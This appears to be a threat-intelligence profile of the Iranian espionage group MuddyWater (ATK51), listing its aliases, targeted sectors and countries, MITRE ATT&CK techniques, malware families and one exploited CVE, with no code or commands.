ATK51

Presumed Origin: Iran < Back

Alias: MERCURY, MobhaM, MuddyWater, NTSTATS, POWERSTATS, Seedworm, Static Kitten, TEMP.Zagros

ATK51 (aka: MuddyWater) is an Iranian threat group. Attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

 

REFERENCES

Target sector

  • Defense
  • Education
  • Energy
  • Financial Services
  • Government and administration agencies
  • Healthcare
  • High-Tech
  • International Organizations
  • Media

Target countries

  • Austria
  • Azerbaijan
  • Bahrain
  • Georgia
  • Russian Federation
  • Pakistan
  • Israel
  • Jordan
  • Iraq
  • Iran, Islamic Republic Of
  • India
  • Mali
  • Saudi Arabia
  • Turkey
  • United Arab Emirates
  • United States Of America

Attack pattern

  • T1002 - Data Compressed
  • T1003 - Credential Dumping
  • T1016 - System Network Configuration Discovery
  • T1027 - Obfuscated Files or Information
  • T1033 - System Owner/User Discovery
  • T1036 - Masquerading
  • T1047 - Windows Management Instrumentation
  • T1057 - Process Discovery
  • T1059 - Command-Line Interface
  • T1060 - Registry Run Keys / Startup Folder
  • T1063 - Security Software Discovery
  • T1064 - Scripting
  • T1081 - Credentials in Files
  • T1082 - System Information Discovery
  • T1083 - File and Directory Discovery
  • T1085 - Rundll32
  • T1086 - PowerShell
  • T1088 - Bypass User Account Control
  • T1090 - Connection Proxy
  • T1104 - Multi-Stage Channels
  • T1105 - Remote File Copy
  • T1113 - Screen Capture
  • T1140 - Deobfuscate/Decode Files or Information
  • T1170 - Mshta
  • T1173 - Dynamic Data Exchange
  • T1175 - Distributed Component Object Model
  • T1191 - CMSTP
  • T1193 - Spearphishing Attachment
  • T1204 - User Execution
  • T1500 - Compile After Delivery

Motivation

  • Espionage

Malwares

  • Mori
  • MuddyC3
  • POWERSTATS
  • PowGoop

Vulnerabilities

  • CVE-2020-1472